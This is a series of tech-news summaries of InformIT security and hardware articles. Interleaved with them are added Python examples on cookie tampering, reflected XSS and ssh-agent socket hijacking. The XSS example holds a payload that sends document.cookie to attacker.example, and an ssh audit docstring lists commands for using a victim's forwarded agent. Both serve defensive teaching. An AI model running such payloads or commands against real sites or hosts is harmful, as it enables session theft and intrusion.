twistedmoney99 writes "InformIT.com has a whimsical yet intriguing look at the OLPC in an article series titled "One Leet Pwning Child — Give one, Get Owned". Part one details how to upgrade the core system with some extras, but part two is where the fun begins as the author converts the OLPC into a lean green hacking machine to enable wireless sniffing, set up the OLPC for vulnerability assessments, and stage the device for a little autopwning with Metasploit." -
Donald Knuth Rips On Unit Tests and More
eldavojohn writes "You may be familiar with Donald Knuth from his famous Art of Computer Programming books but he's also the father of TeX and, arguably, one of the founders of open source. There's an interesting interview where he says a lot of stuff I wouldn't have predicted. One of the first surprises to me was that he didn't seem to be a huge proponent of unit tests. I use JUnit to test parts of my projects maybe 200 times a day but Knuth calls that kind of practice a 'waste of time' and claims 'nothing needs to be "mocked up."' He also states that methods to write software to take advantage of parallel programming hardware (like multi-core systems that we've discussed) are too difficult for him to tackle due to ever-changing hardware. He even goes so far as to vent about his unhappiness toward chipmakers for forcing us into the multicore realm. He pitches his idea of 'literate programming' which I must admit I've never heard of but find it intriguing. At the end, he even remarks on his adage that young people shouldn't do things just because they're trendy. Whether you love him or hate him, he sure has some interesting/flame-bait things to say." -
The 700MHz Question
mstrchf07 writes "The FCC will soon be auctioning off the rights to use the 700MHz spectrum for wireless communications, with the winner being able to choose the direction of wireless services development in the US. With stakes this high, is the playing field fair, and are business needs trumping consumer and technological interests?" -
Owning a Wireless Camera, Its User and Its Network
twistedmoney99 writes "InformIT has posted a two part article by Seth Fogie that describes how a wireless IP camera can be owned and abused. The first part describes how the camera's feed can be sniffed, replaced, or even DoSed off the air by a PDA. The second part then takes a look at the web application interface of the camera (an Axis207W) and exposes numerous vulnerabilities that lead to exposed passwords, a software-based DoS, global XSS — and the kicker — a CSRF attack through which an attacker can remotely penetrate the network it is installed on." -
Full-Disclosure Wins Again
twistedmoney99 writes "The full-disclosure debate is a polarizing one. However, no one can argue that disclosing a vulnerability publicly often results in a patch — and InformIT just proved it again. In March, Seth Fogie found numerous bugs in EZPhotoSales and reported it to the vendor, but nothing was done. In August the problem was posted to Bugtraq, which pointed to a descriptive article outlining numerous bugs in the software — and guess what happens? Several days later a patch appears. Coincidence? Probably not considering the vendor stated "..I'm not sure we could fix it all anyway without a rewrite." Looks like they could fix it, but just needed a little full-disclosure motivation." -
IE Devs Criticize Bank Security Vulnerabilities
mrcaseyj writes "A post on the IE blog criticizes some banks for no longer using secure connections for entire login pages and only encrypting the password as it goes back to the bank. This prevents simple password sniffing but doesn't prevent a man in the middle attack from replacing the unsecured login page with one that has disabled encryption. This is especially a problem if you are using an unencrypted wireless connection such as at a coffee shop, because hackers can easily use the airpwn package to intercept the login page and steal your password. An easy remedy for when a secure page isn't available is to enter a bad username and password which usually brings up a secure page telling you to try again. But can you really trust your money to a bank that doesn't even offer the option of a secure login page?" -
The Best and Worst US Internet Laws
An anonymous reader writes "When a US legislator describes the Internet as a 'series of tubes' you just know that you're going to end up with some wacky laws on the books. Law professor Eric Goldman takes a look at the best and worst Internet laws in the U.S. Goldman offers an analysis of the biggies such as the DMCA, but also shines light on lesser-known laws like the Dot Kids Implementation and Efficiency Act of 2002. And he actually finds four Internet laws that aren't all bad." -
The Student vs Hacker Security Showdown Rematch
monkeyboy44 writes "Following up on last year's entertaining hacker vs. student showdown, InformIT.com once again covered the annual Mid-Atlantic Regional Collegiate Cyber Defense Competition where college students are put to the test. During the three-day event, small teams from eight of the area's colleges are handed insecure networks that they have to lock down and keep running — all while a team of hackers attempt to gain access any way they can. To keep it interesting, the teams also had to perform various tasks, such as program web applications, install IDS systems and more — and if hacked, the US Secret Service was on hand to determine if there was enough data to start an investigation. Once again, the hackers dominated — but not without a few surprises." -
Memories of a Media Card
twistedmoney99 writes "Anyone who has upgraded their digital camera probably has a few older, incompatible media cards lying around — so why not post them on eBay? Well, if you do, be sure to properly wipe them because the digital voyeurs are watching. Seth Fogie at InformIT.com purchased a bunch of used cards from eBay and found recoverable data on most of them. Using the freely available PhotoRec application, he was able to extract pictures, movies, and more from apparently formatted cards. The picture is clear — wipe anything that can store digital data before getting rid of it." -
Mongrel Shortcuts
Simon P. Chappell writes "I'm not normally much of a one for reading and learning out of eBooks, but after a little gentle persuading from my regular contact at the publisher, I agreed to take a look at their Mongrel Shortcut eBook. Mongrel is a pure Ruby web server, and while it is normally associated in most people's minds with Ruby on Rails, it is actually possible to run it standalone, anywhere that you have Ruby. As one who is very firmly in the "dead tree" camp for my choice of reading media, I was surprised to find myself impressed with Addison Wesley's range of Shortcut ebooks; they really are close to the readability of regular books." Read the rest of Simon's review.
Mongrel Shortcuts
Authors: Matt Pelletier and Zed Shaw
Pages: 106
Publisher: Addison Wesley
Rating: 8/10
Reviewer: Simon P. Chappell
ISBN: 0321483502
Summary: An excellent guide to configuring and using Mongrel.
The obvious market segment for this book is the Ruby on Rails developer who wants to understand more about the server that their application is running on and who would like to take more responsibility for its installation and ongoing maintenance. A second target audience would be those who are looking for a small, efficient and robust web server. Mongrel, through strict adherence to the HTTP 1.1 specification, has stayed small and very resistant to many forms of Internet attacks. There is a demand for that kind of server and this book will help those who need it.
Interestingly, these shortcut books are not available through the normal online bookstores. They are currently only available through www.awprofessional.com/ruby or www.informit.com/shortcuts. I'm not sure of the logic behind this and I wonder if that isn't going to hamper sales efforts.
At the risk of pointing out the obvious, this is an eBook and as such is supplied as a Portable Document Format (PDF) file. There are two big positives for me with this book. The first is that the file has no Digital Rights Management technology. This means that you are free to copy it to your computer, but you cannot share the file with anyone else. This is a very reasonable approach for Addison Wesley to take and I applaud them for this. Now that they've shown their trust in us, I just hope that those who purchase this book will abide by those conditions. (Apparently, they don't trust me as much as they trust you, because my copy has "Review Copy Only" on the top of each page! :-)
The second positive with this book is that it's formatted with landscape orientation. This means that the long side of the page runs horizontally and thereby allows the whole page to fit nicely on a standard laptop screen with a very readable text size. Landscape orientation makes for a very clean page layout, a matter of vital importance if you're expecting folks to read it from a computer screen.
As far as the structure of the content, this book eschews chapters in favor of sections. Of course, with no section more than twenty pages long, calling them chapters would have been stretching a point. The nine sections cover about every aspect of using Mongrel that you could hope for in a short book.
The first section introduces the book and explains the formatting used as well as the special little sidebars called "Zed Sez". These are highly opinionated, but very insightful, asides on aspects of Mongrel; they cover reasons for writing it and why it was written the way it was. Section two is an introduction to Mongrel itself, the benefits of using it and the license that it is made available under. Section three works through everything you need to know to get started with Mongrel. Naturally, this includes installing it and basic usage.
Section four covers configuration and the array of command-line options available to the developer or administrator running Mongrel. Section five looks at production deployment and examines a typical deployment. Now, production deployments are an art in themselves, so not every aspect can be covered in a section like this, but it does get you started and presents a not unreasonable approach. Section six explores the options for extending Mongrel. Write your own commands, handlers and plugins; this section will show you how.
Section seven shows how to debug your Mongrel configuration and applications. Section eight looks at performance, another thing that's hard to generalize. Here the emphasis is mostly on gathering data so that you can make meaningful decisions for your own situation. Finally, there is a collection of resources; links for Mongrel, and frameworks that run on it.
In addition to the reasons to like the book that I mentioned back at the start of the review, the book is very authoritative. Having Zed Shaw, the primary author of Mongrel, as the co-author is a powerful help of course. Speaking of Zed, I very much enjoyed his little "Zed Sez" sidebars. To describe his style as "pithy" might be an understatement, but they are certainly very informative and they give interesting insight into the writing of a rising star open-source software package.
For all of the positives, there is no hiding the fact that this Shortcut eBook is only 106 pages long. One of the consequences of this is that there is reduced depth. The material that is in the book is very good, but I know that there were a couple of places where more material would have been very useful. So, if you normally look for vast tomes of ultimate completeness, this might not be a good selection for you.
In conclusion, this seems like a very useful guide for anyone who is starting out to configure and use the Mongrel web server for their Ruby projects.
The Dangers of Improper Cookie Use
shifted89 writes "Over the last year, the security community has exposed web application security for what it is — extremely lacking. However, for all the focus on XSS, CSRF, history stealing, etc., not much attention has been given to the cookie. Unfortunately, cookie misuse can be just as dangerous as, if not more so than, XSS attacks, and InformIT illustrates why. In short, the author clearly demonstrates what can happen when a website improperly uses cookies for customer tracking — including a working illustration." -
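The failure the submission describes, a customer identifier that the server reads straight out of a cookie the client controls, next to the two standard fixes (an HMAC-signed value, and an opaque session token resolved server-side). This is an added example, not code from the InformIT article; the cookie name, the secret key and the customer ids are assumptions.

```python
"""Cookie used as a customer identifier: unsigned vs. HMAC-signed vs. opaque.

Added example; not code from the InformIT article. The cookie name
'customer', SECRET_KEY and the ids used in the demo are assumptions.
"""
import base64
import hashlib
import hmac
import secrets

# Assumption: a server-side secret that never reaches the client.
SECRET_KEY = b"replace-me-with-32-random-bytes-from-os.urandom"


# --- the pattern the article warns about ---------------------------------
def insecure_tracking_cookie(customer_id: int) -> str:
    """Customer id stored in the clear; whoever holds the cookie picks the id."""
    return f"customer={customer_id}"


def parse_insecure(cookie: str) -> int:
    """The server trusts the client-supplied id outright."""
    return int(cookie.partition("=")[2])


# --- tamper-evident version ------------------------------------------------
def _sign(value: bytes, key: bytes) -> str:
    mac = hmac.new(key, value, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(mac).decode().rstrip("=")


def make_signed_cookie(customer_id: int, key: bytes = SECRET_KEY) -> str:
    value = str(customer_id)
    return f"customer={value}.{_sign(value.encode(), key)}"


def verify_signed_cookie(cookie: str, key: bytes = SECRET_KEY):
    """Return the customer id, or None if the cookie was altered or forged."""
    name, _, payload = cookie.partition("=")
    value, dot, sig = payload.rpartition(".")
    if name != "customer" or not dot or not value.isdigit():
        return None
    # Constant-time compare: a plain == leaks timing information about the MAC.
    if not hmac.compare_digest(_sign(value.encode(), key), sig):
        return None
    return int(value)


# --- what the attacker does: edit the id, keep everything else ------------
def tamper(cookie: str, new_id: int) -> str:
    """Rewrite the id in either cookie format, leaving any signature untouched."""
    name, _, payload = cookie.partition("=")
    _value, dot, sig = payload.rpartition(".")
    return f"{name}={new_id}.{sig}" if dot else f"{name}={new_id}"


# --- the stronger option: an opaque id, state kept server-side ------------
SESSIONS: dict = {}  # stands in for a database or cache table


def issue_opaque_session(customer_id: int) -> str:
    """Random token that carries no meaning on its own; guessing one is infeasible."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = customer_id
    return f"sid={token}"


def resolve_opaque_session(cookie: str):
    return SESSIONS.get(cookie.partition("=")[2])


if __name__ == "__main__":
    victim, admin = 1042, 1  # constructed ids
    print("insecure, tampered ->", parse_insecure(tamper(insecure_tracking_cookie(victim), admin)))
    signed = make_signed_cookie(victim)
    print("signed, intact   ->", verify_signed_cookie(signed))
    print("signed, tampered ->", verify_signed_cookie(tamper(signed, admin)))
```

Signing stops the edit but does not hide the value, so a signed cookie is still the wrong place for anything secret; the opaque token with a server-side lookup is the form to prefer for sessions, and it also lets the server revoke a session without changing the key.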
The Wii Disassembled
mrmcgeeber writes "There are two ways to take apart the Wii. The first, as demonstrated by Popular Science, involves breaking the Wii open due to a lack of tools. The second method is a more formal Wii disassembly guide, which is provided by InformIT.com. Either way, you can see some detailed pictures of the internals of the Wii and how the parts are laid out. The InformIT.com version also includes an eight minute teardown video." -
Microsoft Expression vs. Dreamweaver
An anonymous reader writes "Informit has a quick look at Microsoft's Expression suite consisting of Graphic Designer, Interactive Designer, and Web Designer in comparison to Dreamweaver. It seems that Microsoft got tired of relying on FrontPage and is actually going after professionals. From the article: 'What designers might not realize is that Microsoft finally drank the Kool-Aid. The Expression Web Designer application walks the Web standards walk. One caution: Web Designer currently only supports ASP.NET. Microsoft built the ASP.NET platform; it isn't a surprise that Expression Web Designer was designed to support that platform. This is obviously a drawback for those designers who work with PHP, JSP, and other non-ASP.NET platforms, making it difficult for Microsoft to expand its reach beyond the ASP.NET users.'" -
How to Crack a Website - XSS, Cookies, Sessions
twistedmoney45 writes "Informit.com provides an insider's look at a real-life XSS attack and how it was used to bypass the authentication scheme of an online web application, leading to 'shell' access, an admin account, and more. XSS attacks are often discussed in theory — this walk-through illustrates just how dangerous these types of attacks can be in reality." -
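The first step of the attack the submission describes is a script injected into a page that ships the session cookie to the attacker. Below, as an added example that is not the code from the InformIT walk-through, is a reflected-XSS sink next to its output-encoded form, the probe a tester runs to tell them apart, and the Set-Cookie attributes that keep a session out of reach of injected script. The page, parameter, payload and attacker host are constructed.

```python
"""Reflected XSS against a session cookie, and the two server-side controls.

Added example; not the code from the InformIT walk-through. The search
page, the payload and the host attacker.example are constructed.
"""
import html

# Constructed payload: sends document.cookie to a host the attacker controls.
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def render_search_vulnerable(query: str) -> str:
    """User input pasted into HTML untouched: the browser runs the payload."""
    return f"<h1>Results for {query}</h1>"


def render_search_fixed(query: str) -> str:
    """Output-encoded for an HTML text context: '<' becomes '&lt;', '\"' becomes '&quot;'."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def reflects_unescaped(page: str, probe: str) -> bool:
    """The check a tester runs first: is the probe echoed back verbatim?"""
    return probe in page


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie line for a session cookie.

    HttpOnly: document.cookie cannot read it, so the payload above gets nothing.
    Secure:   never sent over plain HTTP.
    SameSite: not attached to cross-site navigations (limits CSRF).
    """
    return f"Set-Cookie: sid={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


def audit_set_cookie(header: str) -> list:
    """Report the protections a session cookie's Set-Cookie line is missing."""
    body = header.split(":", 1)[1] if header.lower().startswith("set-cookie:") else header
    parts = [p.strip() for p in body.split(";") if p.strip()]
    attrs = {}
    for part in parts[1:]:  # parts[0] is name=value
        key, _, value = part.partition("=")
        attrs[key.lower()] = value or True
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: document.cookie exposes the session to XSS")
    if "secure" not in attrs:
        findings.append("missing Secure: cookie is sent over plain HTTP")
    if str(attrs.get("samesite", "")).lower() in ("", "none"):
        findings.append("SameSite absent or None: cookie is attached to cross-site requests")
    return findings


if __name__ == "__main__":
    for name, render in (("vulnerable", render_search_vulnerable), ("fixed", render_search_fixed)):
        page = render(PAYLOAD)
        print(f"{name}: reflected unescaped = {reflects_unescaped(page, PAYLOAD)}")
    print(audit_set_cookie("Set-Cookie: sid=abc123; Path=/"))
    print(audit_set_cookie(session_cookie_header("abc123")))
```

HttpOnly only denies script the cookie value; an injected script can still drive the application with the victim's session from inside the browser, so the encoding fix is the one that closes the hole, and the cookie attributes are defence in depth.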
High-level Languages and Speed
nitsudima writes to tell us Informit's David Chisnall takes a look at the 'myth' of high-level languages versus speed and why it might not be entirely accurate. From the article: "When C was created, it was very fast because it was almost trivial to turn C code into equivalent machine code. But this was only a short-term benefit; in the 30 years since C was created, processors have changed a lot. The task of mapping C code to a modern microprocessor has gradually become increasingly difficult. Since a lot of legacy C code is still around, however, a huge amount of research effort (and money) has been applied to the problem, so we still can get good performance from the language." -
iRobot Scooba Exposed
ticketmaster41 writes "Informit is running an article that takes a look at what's inside a Scooba. As the write-up indicates, adding water to a robotic cleaner not only means more parts, but also more fail-safes to frustrate the end user. The site also has posted an interview with Helen Greiner, one of the founders of iRobot." -
Overconfidence in SSH Protection
nitsudima writes to mention a post on the Informit site about the common misunderstandings surrounding SSH, and how well-intentioned admins may be creating holes in their own security by using it. From the article: "In UNIX, all things are files. To send network traffic, UNIX writes the traffic to the network device file. In this case, the connection to Box A (and that private key used for authentication) is a socket file. This file will shuttle the authentication traffic between Box A and Box P. So what's the risk? Maybe the hacker can't get a copy of the private key through the socket file, but something better (from his/her view) can be done. If the hacker has root on Box D, he or she can point a private copy of the agent forwarding software to that socket file and thereby point the authentication process to the administrator's credentials--the ones kept on the 'safe' intranet. What are the chances that the administrator has configured access to all the DMZ servers he controls?" -
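The socket the quoted passage describes is a real file that root on the intermediate host can hand to its own ssh client; no key ever has to leave the admin's workstation. As an added example, not code from the InformIT post, the audit below enumerates forwarded-agent sockets in the default OpenSSH layout ($TMPDIR/ssh-XXXXXXXX/agent.<pid>), flags `ForwardAgent yes` in an ssh_config, and shows the ProxyJump form that never creates the socket on the middle host. The directory tree built by run_demo() and the two config fragments are constructed.

```python
"""Audit for forwarded ssh-agent sockets that root on a DMZ host could borrow.

Added example, not from the InformIT post. Socket layout follows OpenSSH's
default ($TMPDIR/ssh-XXXXXXXX/agent.<pid>); the sample tree and configs
are constructed.
"""
import os
import pwd
import re
import shutil
import socket
import stat
import tempfile

RISKY_CONFIG = """\
Host bastion
    # the agent socket appears on bastion; root there can use it
    ForwardAgent yes
Host *
    ForwardAgent no
"""

SAFE_CONFIG = """\
Host dmz-*
    # tunnel the TCP connection through bastion; no agent socket is left behind
    ProxyJump bastion
Host *
    ForwardAgent no
"""


def _owner(uid: int) -> str:
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)


def find_agent_sockets(tmp_root: str = "/tmp") -> list:
    """Return sorted (path, owner) pairs for every agent socket under tmp_root.

    Each entry is usable by root with no key material at all:
        SSH_AUTH_SOCK=<path> ssh-add -l          # list the victim's keys
        SSH_AUTH_SOCK=<path> ssh admin@dmz-box   # log in as the victim
    Run as root to see every user's sockets; a normal user sees only its own
    (the ssh-* directories are mode 0700).
    """
    found = []
    try:
        names = os.listdir(tmp_root)
    except OSError:
        return found
    for dirname in names:
        dirpath = os.path.join(tmp_root, dirname)
        if not dirname.startswith("ssh-") or os.path.islink(dirpath) or not os.path.isdir(dirpath):
            continue
        try:
            entries = os.listdir(dirpath)
        except OSError:
            continue
        for name in entries:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if name.startswith("agent.") and stat.S_ISSOCK(st.st_mode):
                found.append((path, _owner(st.st_uid)))
    return sorted(found)


def audit_ssh_config(text: str) -> list:
    """Return (line_no, host_pattern) for every 'ForwardAgent yes' in an ssh_config."""
    findings, scope = [], "*"
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # 'Key value' or 'Key=value'
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key in ("host", "match"):
            scope = value
        elif key == "forwardagent" and value.lower() == "yes":
            findings.append((lineno, scope))
    return findings


def run_demo() -> dict:
    """Build a constructed tree (one real agent socket plus decoys), audit it, clean up."""
    root = tempfile.mkdtemp(prefix="agent-audit-")
    try:
        agent_dir = os.path.join(root, "ssh-Demo1234")
        os.mkdir(agent_dir, 0o700)
        sock_path = os.path.join(agent_dir, "agent.4242")
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        s.bind(sock_path)  # bind() creates the socket inode; it outlives close()
        s.close()
        open(os.path.join(agent_dir, "agent.notes"), "w").close()  # decoy: regular file
        os.mkdir(os.path.join(root, "other"))                         # decoy: not ssh-*
        return {"sockets": find_agent_sockets(root),
                "config_findings": audit_ssh_config(RISKY_CONFIG)}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    result = run_demo()
    for path, owner in result["sockets"]:
        print(f"forwarded agent socket {path} owned by {owner}")
    print("ForwardAgent yes at:", result["config_findings"])
    print("hardened config findings:", audit_ssh_config(SAFE_CONFIG))
```

Hijacking a socket gives the attacker the use of the keys only while the admin's session is up, which is why the quoted post focuses on how many DMZ hosts that one session can reach; ProxyJump removes the socket from the bastion altogether, and where forwarding is genuinely needed, `ssh-add -c` makes the agent ask for confirmation on every signature so a borrowed socket produces a visible prompt instead of a silent login.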
Cell Phones Responsible For Next Internet Worm?
nitsudima writes "The mobile devices you know and love are great for productivity, but they have completely changed the vulnerability state of our networks. Norm Laudermilch tells you why you should be afraid, very afraid." From the article: "The new and largely unexplored propagation vector for malicious code distribution is mobile devices. With 802.11, Bluetooth, WiFi, WiMAX, MMS, Infrared, and cellular data capabilities on almost all new models, these devices provide a wealth of opportunity for the transmission of data. With no notion of user access levels in the compact mobile operating systems, a lack of effective authentication, and no data encryption, these environments are prime targets for the incubation of malicious code." -
Students vs. Hackers
sethfogie wrote to mention Informit.com's coverage of the Mid-Atlantic Regional Collegiate Cyber Defense Competition. Students put their skills to the test, trying to lock down systems against intrusion from an invading hacker team. All in the name of learning. From the article: "When the three-hour grace period was over, the Red Team slowly worked their way into attack mode. One member started to sort through the information they gleaned from their scans and investigated each possible exploit. Another member fired up a MySQL database client and started to poke around the students' databases looking for sensitive data. The two others were adding/changing accounts on routers, firewalls, and systems. However, for the most part, the students were not being pelted with attacks. And this continued for the next several hours." -
Roomba Vacuum Robot Opens to Hackers
FleaPlus writes "iRobot has quietly released the specifications (pdf) for the Roomba Serial Control Interface. Using a serial port one can now tinker with the Roomba by controlling behaviors, programming new songs, and remotely monitoring sensors. Hopefully this will allow for some clever hacks." -
Stroustrup on the Future of C++
/ASCII writes "Bjarne Stroustrup, the father of C++, has written an essay [PDF] on the features of the upcoming C++0x standard. In his essay, he argues that new features should whenever possible go into the standard library and not into the language, but that the language needs to shave off a few rough corners to make it easier to use for novices." -
Anatomy of a Hack
Tiberius_Fel writes "Informit.com is running an extensive article about the anatomy of a hack against a sample network. It's an excerpt from a book titled Protect Your Windows Network: From Perimeter to Data. Even though it makes references to Windows, the techniques can be applied to other operating systems fairly easily." From the article: "Although attacking networks can be fun and informative--not to mention illegal if you do not have all the proper permissions--the fact remains that the vast majority of us do not need to know how to do so. Frankly, becoming a good penetration tester (pen tester) takes more than a week-long class. It takes commitment, dedication, intuition, and technical savvy, not to mention a blatant disregard for the rules and the right way to do things." -
Inside the PSP
fogez writes "We have seen numerous hacks for the PSP in the last couple of days, but have you seen what is inside this marvel? This might scare off many new PSP owners, but if you are curious and want some direction, this article is a good place to start. See the PSP laid bare, from LCD to wireless network card. BTW, any attempt to imitate will result in a void warranty :)" -
Current State of Haptic Research
prostoalex writes "An article on InformIT.com looks at the current state of haptic technologies: 'In the consumer realm, two companies dominate the field in the creation of tactile I/O devices: Immersion Corporation and SensAble Technologies. Right now, each seems interested in consolidating a position in the marketplace.'"